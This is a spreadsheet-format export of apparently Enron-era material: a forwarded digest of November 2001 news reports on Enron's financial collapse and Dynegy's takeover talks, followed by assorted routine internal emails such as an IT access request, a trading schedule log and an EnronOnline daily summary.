After all, the market's initial reaction to the Dynegy/Enron Corp. (ENE) talks was negative. Dynegy's share price fell 9% to $33 on the Wednesday, the day that Dynegy was negotiating a possible acquisition of Enron were disclosed by CNBC. But Dynegy's stock rebounded sharply Thursday to recover that loss and then some, and it's up another $3 to near $40 Friday. _x000D_
Is this a case of average investors approving Dynegy's "steal" of formerly formidable Enron? Or were Wall Street banks, holding a lot of Enron debt, trying to encourage Dynegy to do a deal? About 75% of the 12 million Dynegy shares bought Thursday were purchased in a few hundred large blocks. _x000D_
Some usually talkative Wall Street bank sources refuse to say a word about Enron or Dynegy, even off the record. Wall Street may be biting its collective lip in the hopes that Dynegy signs the contracts to buy Enron and brings in a critical injection of cash. That cash would come from ChevronTexaco Corp. (CVX), which owns about a quarter of Dynegy. According to the Wall Street Journal, the terms of the deal call for ChevronTexaco to inject $1.5 billion immediately and another $1 billion into the combined companies if the deal goes through. _x000D_
Wall Street holds billions in Enron debt, which Dynegy is fully aware of. But Dynegy might be getting more than it's bargaining for, particularly regarding Enron's numerous obligations to deliver its own shares in the future at minimum values. _x000D_
SEC Probe Complicates Deals Based On Stock _x000D_
_x000D_
Any company that acquires Enron may have to make good on those commitments to issue stock pegged to values much higher than $9.50 a share, or perhaps to make up the difference in cash. _x000D_
In a publicly disclosed example, an Enron off-balance-sheet financial affiliate - Whitewing Associates - owns 250,000 shares of Enron convertible preferred stock, which are good upon conversion in January 2003 for 50 million shares of Enron common stock at a guaranteed minimum value of $48.55 a share. _x000D_
Enron's stock is currently trading below $9 a share. According to the terms of Whitewing's convertible preferred holding, Enron would have to deliver far more shares at current prices - 1,080 - for each of the 250,000 convertibles. _x000D_
But Enron can't issue new stock now because it's under investigation by the U.S. Securities and Exchange Commission, so it would be obliged to come up with the $40-per-share difference in cash. Since Enron owns 50% of Whitewing, it could tear up most of the convertibles, but not all of them. A rough estimate is that Enron - or Dynegy - would still owe the dozens of mutual funds that invested in Whitewing around $500 million cash. _x000D_
Dynegy is surely familiar with that deal, but highly leveraged Enron has similar share-settled arrangements floating around that haven't been so fully disclosed. The lesser-known deals are similarly troublesome due to the combination of Enron's stock-price crash and its inability to issue lots of new stock to make up the difference. _x000D_
Another Enron-related partnership, the Marlin Water Trust II, is part of Enron's disastrous venture into water companies through its Azurix affiliate and the later refinancing of huge losses related to the water investments. Enron has marked down the value of its direct holdings in Azurix, but not the assets of Marlin, even though Marlin's primary asset is supposed to be its half of Azurix. _x000D_
Prominent Enron short-seller Richard Grubman of Highfields Capital Management has asked Enron why Marlin's assets are still valued at $1 billion, when 50% of Azurix would seem to be a worth a fraction of that amount. Enron has declined to answer Grubman's question fully. _x000D_
Is Wall Street Short? _x000D_
_x000D_
Fitch credit rating agency said this July that Marlin's debt is ultimately supported by "an equity commitment from Enron in the form of mandatorily convertible preferred stock." Neither the number of shares nor the guaranteed minimum value for those shares has been disclosed. If Enron can't deliver those shares, it is obliged to make up the difference in cash, Fitch said. _x000D_
"In the event that the issuance of the preferred stock yields less than the amount required to redeem the senior notes, Enron is required to deliver additional shares," Fitch said. "If Enron cannot or does not deliver on this obligation, then the amount of the deficiency becomes a payment obligation of Enron, representing a general unsecured claim." _x000D_
In another partnership, disclosed in Enron's 2000 annual report but not named, Enron invested "the right to receive up to 18 million shares of outstanding Enron common stock in March 2003 (subject to certain conditions)." _x000D_
Do those conditions include a share value much higher than $9.50? Did Enron prudently purchase puts on its own stock from Wall Street to cover some of its positions? As part of that same deal, Enron paid $123 million to purchase unspecified options on 21.7 million shares of its common stock. _x000D_
Because these deals are done through private placements of debt, Enron doesn't have to answer questions, and it has declined to do so. Dynegy also refused to answer questions on the issue. _x000D_
One Wall Street equity derivatives trading manager indicated that all the banks have found themselves "unexpectedly short in-the-money puts" on Enron. Unexpectedly, perhaps, not just because Enron stock has fallen so far, but because the SEC investigation prevents Enron from issuing additional shares. _x000D_
Wall Street has been sweating for weeks, and millions don't make Wall Street sweat. Billions do, and the concern has to do with liabilities beyond Enron's fully disclosed traditional debt. The banks have told Enron they don't expect to get clobbered on a technicality that wouldn't have arisen without the SEC investigation Enron brought on itself, a person at a bank involved in the talks said. Enron agreed in principle, but the negotiations to make Wall Street whole were put on hold for the Dynegy talks. _x000D_
If Dynegy buys Enron, it may be stepping into the middle of those arrangements, letting Wall Street off the hook. _x000D_
Dynegy competitor El Paso Corp. (EPG) and ChevronTexaco rival Royal Dutch/Shell (RD) reportedly took a look at acquiring Enron last week and passed. Is Dynegy smarter than El Paso? Is Chevron smarter than Shell? _x000D_
True Dynegy believers better hope so. _x000D_
-By Mark Golden, Dow Jones Newswires; 201-938-4604; mark.golden@dowjones.com_x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
USA: UPDATE 1-Enron's rating cut, woes finally hit trading floor._x000D_
By Janet McGurty_x000D_
_x000D_
11/09/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
NEW YORK, Nov 9 (Reuters) - Enron Corp., on the verge of a bailout by rival Dynegy Inc., on Friday had its credit ratings cut to a notch above junk status and some energy traders became increasingly leery of dealing with the company. _x000D_
Moody's Investors Service cut Enron's long-and short-term ratings, affecting about $13 billion in debt, and warned the company's rating could be cut again to junk status on continued loss of investor confidence, impairing its ability to operate._x000D_
A significant amount of debt coming due in the near term, and the potential for increased margin requirements from its counterparties in wholesale trading operation also puts further pressure on Enron, the ratings agency said. _x000D_
"The company may not be able to retain investment-grade characteristics," Moody's said. _x000D_
Enron's trading partners began to cast a more watchful eye on their relationship with their energy trading behemoth, which has seen almost $19 billion slashed from its market worth in the past month on mounting investor concerns. _x000D_
"Our people are definitely looking at our dealings with Enron after the downgrade ... We need to make sure our bills will be paid," one Texas-based spot trader said, adding his company was still conducting business with Enron. _x000D_
The stock, which has plummeted 89 percent this year, moved into the black on Friday after Enron confirmed talks regarding the acquisition of Enron by Dynegy are continuing. _x000D_
An announcement, which is expected later Friday, is expected to include a $1.5 billion injection of capital for Enron from ChevronTexaco Corp., the No. 2 U.S. oil company, and 26.5 percent holder of Dynegy. _x000D_
Shares of Enron rose 40 cents, or 4.8 percent, to $8.81 in afternoon trade on the New York Stock Exchange, and Dynegy gained $2.92, or 8 percent, to $39.42. The stock was the most actively traded on the NYSE. _x000D_
RESTATED RESULTS _x000D_
In recent weeks Enron's stock has plunged amid investor unease about disclosures of off-balance sheet deals involving its former chief financial officer. The deals are now under investigation by the Securities and Exchange Commission for possible conflict of interest. _x000D_
"People just don't want to deal with them anymore," said one trader, who heads the trading desk of one of the world's largest oil companies. _x000D_
On Thursday, Enron acknowledged it erred on past earnings reports and restated financial results going back to 1997. The restated earnings cut net income by $591 million over the period, or 22 percent, and increased its debt by $628 million, pulling some of its partnerships onto the balance sheet. _x000D_
Enron also fired its treasurer and a general counsel of one of its divisions on Thursday. _x000D_
Until now, Enron's trading operations appeared relatively sheltered from its financial troubles, especially in the daily markets contracts. _x000D_
Trading volumes on EnronOnline, the leading Internet-based trading system for electricity, actually increased over the rolling 30-day period. _x000D_
At the beginning of the week, EnronOnline dollar volumes averaged between $2.6 billion and $2.8 billion, compared with a 30-day rolling average of $2.6 billion, according to Eric Thode, a spokesman for EnronOnline. _x000D_
The number of transactions posted on the site averaged over 6,500 on Monday, well above the 5,800 average for the past 30 days. _x000D_
TRADING UNDER PRESSURE _x000D_
But Friday, trading volume appeared to wane slightly, according to one industry watcher _x000D_
"I've been watching the Enron board all morning and it hardly lit up at all," said one trader in the U.S. Northeast. The board lights up each time a transaction is made for delivery to a particular point. _x000D_
The hardest hit of Enron's energy trading operations appear to be natural gas trades and both natural gas and electricity forward contracts, which are trades for delivery from one month to five years ahead. _x000D_
"Starting today we are no longer doing forward deals with Enron on the gas side. We are still doing day-ahead deals though," one Southeast dealer said. _x000D_
He added he was unsure if his company was still trading forwards, or long-term deals, on the electricity side. _x000D_
"People are becoming much more cautious about entering into long-term energy deals with Enron, especially the one-to five-year delivery contract for gas or electricity," said one major Midwestern power trader. _x000D_
While many major traders watch online volumes and transactions, many bypass the system and make their deals over the telephone directly with Enron. _x000D_
Earlier this week. major natural gas producer Apache Corp. said it unwound most of its natural gas hedges due to concerns about increasing risks in the energy derivatives market as a result of Enron's recent problems._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
USA: U.S. stocks crawl higher but profit warnings weigh._x000D_
By Elizabeth Lazarowitz_x000D_
_x000D_
11/09/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
NEW YORK, Nov 9 (Reuters) - Stocks ticked higher in early afternoon trading on Friday as investors took a positive view of the latest economic news, but profit warnings from household names like H.J. Heinz &amp; Co. and The Walt Disney Co. put a cap on their enthusiasm. _x000D_
Energy and oil services stocks helped carry the market higher, getting a boost after Russia's prime minister indicated Russian companies will join the Organization of Exporting Petroleum Countries, the oil cartel, in cutting production to lift oil prices._x000D_
The market's ability to make up virtually all of the losses it made in the wake of the Sept. 11 attacks on New York and Washington has given investors courage, despite the dismal condition of corporate earnings, said said Nat Paull, portfolio manager at New Amsterdam Partners. _x000D_
"The current profit profit picture, I think everybody knows, is pretty weak, but the focus is turning to 2002, and that definitely is going to be a rebound year," Paull added. _x000D_
The market surged this week on a slew of interest-rate cuts in Europe and the United States, but Wall Street is still torn over whether the moves are enough to patch up the bruised global economy, traders said. _x000D_
The Dow Jones industrial average rose 13.69 points, or 0.14 percent, at 9,601.21, and the broader Standard &amp; Poor's 500 Index edged up 2.49 points, or 0.22 percent, to 1,121.03. _x000D_
The technology-laced Nasdaq Composite rose 5.22 points, or 0.29 percent, to 1,832.99. _x000D_
Stocks got a fleeting boost on news Afghan that anti-Taliban forces entered the northern city of Mazar-i-Sharif, marking an advance in the war against the group suspected of masterminding the Sept. 11 attacks on the United States. _x000D_
Oil stocks were higher, including Amerada Hess, which gained $2.44 to $61.59, and Conoco Inc., up $1.29 at $26.81. _x000D_
The latest earnings news kept Wall Street's tone subdued, however, after entertainment giant Walt Disney and food manufacturer Heinz warned profits would likely be lower than expected. _x000D_
Disney, which said it was suffering from weak advertising and low ratings at its ABC TV network and lower attendance at its theme parks, all worsened after Sept. 11. Disney reversed an early loss and climbed 7 cents to $18.91. _x000D_
Heinz slumped $3.14 to $39.56 after cutting its earnings forecast, citing a slowdown in its food service business as a result of lower demand from restaurants. _x000D_
Traders said they expect volume to lighten after 2:00 p.m. 1900 GMT, when the bond market closes early in observance of the Veteran's Day holiday on Monday. _x000D_
The Nasdaq has surged this week following aggressive rate cuts by the European Central Bank, the Bank of England and the U.S. Federal Reserve. The hope is that lower borrowing rates will prompt companies to spend and expand, in turn expanding global economies and corporate earnings. _x000D_
But dismal corporate outlooks and mixed economic news stunted the market's gain. _x000D_
A report showing plunging U.S. wholesale prices weighed on stocks as investors began to question whether the drop will soon hurt earnings. _x000D_
The Producer Price Index had the sharpest drop on record in October as a slowing global economy sapped energy prices and American carmakers offered cut-rate financing to lure buyers into showrooms after Sept. 11 attacks. _x000D_
"People may be worried about deflation," said James Volk, co-director of institutional trading at D.A. Davidson and Co. in Portland, Oregon. _x000D_
Still, a consumer confidence indicator offered a bright note after sentiment strengthened in early November. _x000D_
Expectations and current conditions rose to 83.5 from 82.7 in October, according to the University of Michigan's index. Analysts had forecast the index to fall to 78.7. _x000D_
Enron Corp. was most active on the New York Stock Exchange for the 10th session of the past 13. _x000D_
The stock initially fell after Moody's Investors Service cut Enron's short-term and long-term rating because of a steep loss of investor confidence. Then it rose 56 cents to $8.97 as news trickled out that rival Dynegy Inc. is close to taking over Enron at about $10 a share. _x000D_
Enron's stock and credit ratings plummeted after off-the-balance-sheets deals, now under investigation, were disclosed in mid-October._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
UK: UK power prices gain, take strength from gas._x000D_
_x000D_
11/09/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
LONDON, Nov 9 (Reuters) - British electricity prices strengthened on Friday, playing catch-up to gas which is being lifted by firmer oil prices. _x000D_
Traders said volume was fairly light and continued uncertainty about Enron was muting the market to some degree._x000D_
Day-ahead (Monday) baseload electricity rose to about 19.50 pounds per megawatt hour from 18 pounds or so on Thursday. _x000D_
Block five day-ahead (Monday) was heard done at about 50 pounds. _x000D_
Prompt gas prices rose by as much as six pence a therm on Friday on the back of cold temperatures. _x000D_
December baseload power was also stronger at about 18.80 pounds from 18.55 pounds while January baseload rose to 21.1 pounds and February baseload gained to 20.5 pounds. _x000D_
On Friday Enron's credit ratings were cut to a notch above junk status and some energy traders have become increasingly wary of dealing with the company. _x000D_
A report in the Wall Street Journal on Friday said Dynegy is close to buying Enron, currently under investigation after disclosures of off-balance sheet deals, for $7 billion._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Business_x000D_
Play of the Day: Dynegy Close To Buying Beleaguered Enron_x000D_
Deborah Marchini, Peter Viles_x000D_
_x000D_
11/09/2001_x000D_
CNNfn: Halftime Report_x000D_
(c) Copyright eMediaMillWorks, Inc. (f/k/a Federal Document Clearing House, Inc.). All Rights Reserved._x000D_
DEBORAH MARCHINI, CNNfn ANCHOR, HALFTIME REPORT: Enron (URL: http://.www.enron.com/) reportedly is close to a merger deal with rival Dynegy (URL: http://www.dynegy.com/) in what would be the implausible end to a remarkable corporate collapse. Peter Viles takes a second look at that collapse now in our "Play of the Day". _x000D_
Pete?_x000D_
PETER VILES, CNNfn CORRESPONDENT: This is really a costly lesson for investors, but it`s worth revisiting, painful at it is. And the lesson is this: Do not count on straight talk from a public company, especially if that company is in trouble. Let`s go back to October 22nd. Enron, on that day, confirms the SEC is looking into its various deals. _x000D_
And Enron issues this statement, saying, "We believe everything that needed to be considered and done in connection with these transactions was considered and done." At that point the stock is at $24.40, down from a peak of $82. I`m sure there were some investors who were thinking, gee, the company says the deals are OK. The stock has been beaten up and I`m going to trust the company on this one. Well, fast forward to yesterday, it turns out that everything that needed to be considered and done in those transactions-was not! _x000D_
The company says, "Certain off balance sheet entities should have been included in Enron`s consolidated financial statements; $591 million in earnings disappears, the stock closes $8.41. _x000D_
So, if you trusted and believed that a company in late October, just about three weeks ago, you would have lost 65 percent of your investment-just in the past three weeks, not going back to the $82. _x000D_
And to be clear-we`re not picking on the company here, they made that initial statement knowing full well this was a huge controversy. The government was looking into it, investors were losing faith in management. Still they said, we believe we did everything right. I think in that case it might have been better to say, we`re just looking into it. _x000D_
MARCHINI: Why would Dynegy want to risk exposing itself in fear that there might be still more to come? _x000D_
VILES: Well, this new information about earnings, this restatement did not come from the company. It came from a special board that was brought in just to look at this. And the lawyer for that board was Bill McLucas (ph). He used to be the chief enforcement officer from the SEC. So, a certain amount of credibility in the new set of numbers. Also the performance this year at Enron is not terrible. The earnings I think, are at $1.30 per share, through three quarters. So, you`re looking at maybe $1.50 for the year. An $8 stock, $1.50 in earnings. It`s really cheap, maybe there is a business here worth saving. _x000D_
But it is clear that current management does not have a whole lot of credit, is they`re bottom fishing and they`re bottom fishing at a pretty cheap price. I mean it was a $20 stock when the controversy erupted. It has only gone lower and I guess they think there is some value here. _x000D_
MARCHINI: You know, Moody`s downgraded it today. This is a business that is very heavily depend on looking good to counterparts, looking like its not much of a risk. _x000D_
VILES: Yes, and that`s what`s gone wrong in the last three weeks. People have just said, Geeze, there is just all kinds of stuff going on there. I don`t really understand it. The company hasn`t really explained it. I think I`ll stay away and just let the dust clear and see what happens when it does clear. _x000D_
I think what Dynegy is saying, they think they`ve seen enough to know that there is something left to the company. It has been premiere energy trading company in the United States. Energy trading is decent business. Dynegy knows that business. They would probably know better than bond investors and stock investors what is there and what`s of value. _x000D_
MARCHINI: At least their shareholders hope so, right? _x000D_
VILES: Hope so. _x000D_
MARCHINI: Thanks, Peter. _x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Indian court restrains Enron from serving termination notice over power project_x000D_
By N. SUNIL_x000D_
Associated Press Writer_x000D_
_x000D_
11/09/2001_x000D_
Associated Press Newswires_x000D_
Copyright 2001. The Associated Press. All Rights Reserved._x000D_
BOMBAY, India (AP) - An Indian court Friday temporarily barred Enron Corp. from serving a final termination notice to the state utility in an ongoing tug-of-war over the American company's $2.9 billion power project, court officials said. _x000D_
The Bombay High Court restrained Enron subsidiary Dabhol Power Co. from serving the notice before the next hearing, scheduled for Dec. 3._x000D_
The ruling came even as talks were being held in Singapore aimed at salvaging the power project, focusing on two potential buyers for Enron's controlling stake. Enron owns 65 percent shares of the Dabhol Power Co. _x000D_
Two of India's largest private power companies - Tata Power Co. and BSES Ltd. - are the only contenders vying to buy Enron's stake, V.K. Saxena, chief general manager of the Industrial Development Bank of India, told Dow Jones Newswires Friday. _x000D_
In Bombay, India's financial hub, DPC had served a preliminary termination notice on the state-run Maharashtra State Electricity Board in May 2001 following disputes over the payment of monthly power bills. _x000D_
According to the agreement between DPC and the utility, the Enron subsidiary can serve a final termination notice only six months after a preliminary notice. That initial notice was served in May, and DPC's six-month deadline is Nov. 19. But it would now be deferred until the court ruling. _x000D_
Lenders to the project have approached the high court seeking to prevent the DPC from serving the final notice over the 2,100 megawatt project, so that they can recover their money. _x000D_
In May, Enron stopped construction of the 90 percent completed project - India's biggest ever foreign investment. _x000D_
Enron, which has seen its share prices plunge 80 percent over the past three weeks over worries about its finances, is in talks with rival energy trader Dynegy Inc. over a possible merger._x000D_
_x000D_
_x000D_
_x000D_
Copyright ? 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. 	_x000D_
_x000D_
Source: Dynegy close to deal to buy Enron_x000D_
By BRAD FOSS_x000D_
AP Business Writer_x000D_
_x000D_
11/09/2001_x000D_
Associated Press Newswires_x000D_
Copyright 2001. The Associated Press. All Rights Reserved._x000D_
NEW YORK (AP) - Dynegy Inc. is close to finalizing a deal to buy its much larger, albeit troubled, rival Enron Corp., for between dlrs 7 billion and dlrs 8 billion in stock, a source familiar with the situation said. _x000D_
The deal could be announced Friday and would include an immediate infusion of about dlrs 1.5 billion from ChevronTexaco Corp., which owns more than a quarter of Dynegy, the source said on condition of anonymity. ChevronTexaco would contribute an additional dlrs 1 billion upon completion of the deal, though the source said talks could still fall apart._x000D_
Both Dynegy and Enron have released statements confirming they were discussing a deal, but declined to provide any details. Neither company could immediately be reached for comment on Friday. _x000D_
In a related matter, Moody's Investors Service early Friday downgraded Enron's debt ratings to one level above junk bond status and said the company's long-term debt ratings remain under review for further downgrade. _x000D_
On Thursday, Enron Corp. acknowledged it overstated earnings by about 20 percent over the past four years and kept large amounts of debt off its balance sheets through business partnerships now under investigation by the Securities and Exchange Commission. _x000D_
Enron's stock price has been pounded in the past three weeks, falling roughly 80 percent over concerns that serious financial problems were not being disclosed to shareholders. _x000D_
</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 13:51:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Ummmmmm</t>
  </si>
  <si>
    <t>_x000D_
My sentiments exactly!_x000D_
 -----Original Message-----_x000D_
From: 	Jones, Tana  _x000D_
Sent:	Thursday, October 25, 2001 3:45 PM_x000D_
To:	Radous, Paul; Heard, Marie_x000D_
Subject:	RE: Ummmmmm_x000D_
_x000D_
_x000D_
We appreciate all Credit does for us!_x000D_
 -----Original Message-----_x000D_
From: 	Radous, Paul  _x000D_
Sent:	Thursday, October 25, 2001 3:44 PM_x000D_
To:	Heard, Marie; Jones, Tana_x000D_
Subject:	Ummmmmm_x000D_
_x000D_
Thanks for the treat this afternoon.  We appreciate it!</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 03:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Request Submitted: Access Request for kenneth.parkhill@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because the requester specified you as their _x000D_
Manager's alternate. Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000008400&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000008400_x000D_
Approver            : stinson.gibner@enron.com_x000D_
Request Create Date : 11/28/00 11:27:17 AM_x000D_
Requested For       : kenneth.parkhill@enron.com_x000D_
Resource Name       : Visual Studio Enterprise_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 06:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Cal-ISO Wants Pwr Generators To Forward Bid 70% -Sources</t>
  </si>
  <si>
    <t>Jim:  To say that there was gaming in the UK pool is a significant _x000D_
understatement.  Couple thoughts...I'm pretty sure that Seab has done _x000D_
extensive analysis on the UK and he'd likely therefore be very useful in _x000D_
developing rebuttal. (Though very close to it at one point, I've been removed _x000D_
for a few years.)  Also, Schroeder and his gang could also likely shed some _x000D_
insights, and seems that Schroeder's pretty close now with Littlechild---that _x000D_
might be another avenue for information to rebut._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 06:53:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'billy.dixon@bp.com'})</t>
  </si>
  <si>
    <t>RE: Enron Canada Corp</t>
  </si>
  <si>
    <t>I sure will if you will tell me the principal place of business of all your entities party to the Master Netting Agreement._x000D_
_x000D_
Enron Canada Corp._x000D_
3500, 400 - 3rd Avenue S.W._x000D_
Calgary, Alberta  T2P 4H2_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Dixon, Billy D" &lt;billy.dixon@bp.com&gt;@ENRON  _x000D_
Sent:	Tuesday, November 06, 2001 7:47 AM_x000D_
To:	Heard, Marie_x000D_
Subject:	Enron Canada Corp_x000D_
_x000D_
Would you please tell me where Enron Canada Corp.'s principal place of_x000D_
business in Canada is located?_x000D_
_x000D_
Very truly yours,_x000D_
_x000D_
BILLY_x000D_
Billy D. Dixon_x000D_
Attorney_x000D_
BP America Inc._x000D_
501 Westlake Park Blvd., Rm 16.166_x000D_
Houston, Texas 77079_x000D_
Direct 281/366-4745_x000D_
Fax 281/366-5901_x000D_
billy.dixon@bp.com_x000D_
_x000D_
***IMPORTANT -- THIS EMAIL AND ANY ATTACHMENTS HERETO ARE ATTORNEY-CLIENT_x000D_
AND/OR ATTORNEY WORK-PRODUCT PRIVILEGED AND CONFIDENTIAL.  If you have_x000D_
received this email in error, do not under any circumstances read, forward,_x000D_
copy, disseminate or save this email or any of its attachments.  If you have_x000D_
received this email in error, take the following actions: (1) reply to this_x000D_
email indicating that you received this email in error, and (2) delete and_x000D_
completely erase this email and its attachments from your computer and any_x000D_
backup systems or "Deleted Items" folders.</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 10:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/23/01; HourAhead hour: 18;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/23/01; HourAhead hour: 18;  No ancillary schedules awarded.  _x000D_
Variances detected._x000D_
Variances detected in Generation schedule._x000D_
Variances detected in Load schedule._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001042318.txt_x000D_
_x000D_
---- Generation Schedule ----_x000D_
$$$ Variance found in table tblGEN_SCHEDULE._x000D_
     Details: (Hour: 18 / Preferred:   0.00 / Final:   0.00)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EES_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/23/01_x000D_
  UNIT_ID: BADLND_7_PL1X2_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 18 / Preferred:   5.85 / Final:   5.30)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: PGE2_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/23/01_x000D_
  SC_ID: EPMI_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 18 / Preferred:   6.96 / Final:   8.06)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SCE1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/23/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 22:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mcarson@gtemail.net'})</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mike Carson/Corp/Enron on 11/21/2000 _x000D_
06:36 AM ---------------------------_x000D_
_x000D_
_x000D_
Matt Besch &lt;m_besch@yahoo.com&gt; on 11/20/2000 08:32:23 PM_x000D_
To: Mike.Carson@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Re:_x000D_
_x000D_
_x000D_
po box 4962_x000D_
key west, fl 33040_x000D_
_x000D_
why??_x000D_
_x000D_
--- Mike.Carson@enron.com wrote:_x000D_
&gt; What is your address??_x000D_
&gt;_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Yahoo! Shopping - Thousands of Stores. Millions of Products._x000D_
http://shopping.yahoo.com/_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Jun 2001 07:42:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: FERC News Release</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Almeida, Keoni" &lt;KAlmeida@caiso.com &lt;mailto:KAlmeida@caiso.com&gt;&gt;@ENRON [mailto:IMCEANOTES-+22Almeida+2C+20Keoni+22+20+3CKAlmeida+40caiso+2Ecom+3E+40ENRON@ENRON.com] &lt;mailto:[mailto:IMCEANOTES-+22Almeida+2C+20Keoni+22+20+3CKAlmeida+40caiso+2Ecom+3E+40ENRON@ENRON.com]&gt; _x000D_
Sent:	Monday, June 18, 2001 4:10 PM_x000D_
To:	O'Neil, Murray P.; Stokley, Chris; Foster, Chris H.; Williams III, Bill; Rosman, Stewart; Emmert, Caroline; Johnson, Donna; Dunton, Heather_x000D_
Subject:	FW: FERC News Release_x000D_
_x000D_
In case you have not seen this, here it is:_x000D_
&lt;http://www.ferc.gov/news/pressreleases/mitigation.pdf&gt;_x000D_
_x000D_
Keoni Almeida_x000D_
California Independent System Operator_x000D_
phone: 916/608-7053_x000D_
pager:  916/814-7352_x000D_
alpha page:  9169812000.1151268@pagenet.net &lt;mailto:9169812000.1151268@pagenet.net&gt;_x000D_
e-mail:  &lt;&lt;mailto:kalmeida@caiso.com&gt;&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 12 Mar 2001 13:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Portland St. Patty's Day</t>
  </si>
  <si>
    <t xml:space="preserve">Sounds good man, I talked to Wilson a few hours ago and he is going to try _x000D_
and come up too.  Check ya later. </t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EnronOnline Executive Summary for December 21, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">Following please find the Daily EnronOnline Executive Summary._x000D_
_x000D_
EnronOnline Executive Summary for 12/21/2000_x000D_
Transaction Summary	_x000D_
External Transactions Today	3,136_x000D_
Average Daily External Transactions (30 day Trailing Avg)	4,221_x000D_
Total Life to Date Transactions	542,283_x000D_
_x000D_
EnronOnline Daily % of Entity's Total Transactions for 12/21/00	Trans	Percent_x000D_
Enron North America	2,252	69%_x000D_
Enron Europe Limited	194	39%_x000D_
Global Products	66	18%_x000D_
Enron Metals	624	20%_x000D_
_x000D_
EnronOnline Percentage of Total Corporate Transactions _x000D_
(30 day Trailing Avg)	53%_x000D_
_x000D_
Gross Notional Value of EnronOnline Transactions	Total_x000D_
Today	2,050,655,061_x000D_
MTD	48,918,672,695_x000D_
LTD	327,775,511,765_x000D_
Average Daily Notional Value (30 Day Trailing Avg)	3,348,555,351_x000D_
	_x000D_
Notional Revenue from Physical Flows to Date	22,178,488,030_x000D_
_x000D_
Counterparties, Users, and Products Offered	_x000D_
Counterparties having transacted to date	619_x000D_
New Counterparties transacting for the first time today	0_x000D_
Number of Products Offered Today	979_x000D_
Total Number of External Users Logged on Today	3,084_x000D_
Average # of External Users logged on (30 day Trailing Avg)	3,063_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Nov 2000 07:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Alonzo Williams</t>
  </si>
  <si>
    <t xml:space="preserve">On lunch, I've asked Twanda to reschedule.  thanks.  mhc_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Bill W. Ogden" &lt;bogden@ogwb.com&gt; on 11/07/2000 02:48:58 PM_x000D_
Please respond to &lt;bogden@ogwb.com&gt;_x000D_
To: "Michelle Cash" &lt;michelle.cash@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Alonzo Williams_x000D_
_x000D_
_x000D_
Hi Michelle -- just a reminder note that no one has told me to file the_x000D_
Alonzo Williams petition. Have the powers that be decided to let this one_x000D_
ride? And, more importantly, when can we reschedule lunch? Let me know;  --_x000D_
Bill_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 05:00:00 -0700 (PDT)</t>
  </si>
  <si>
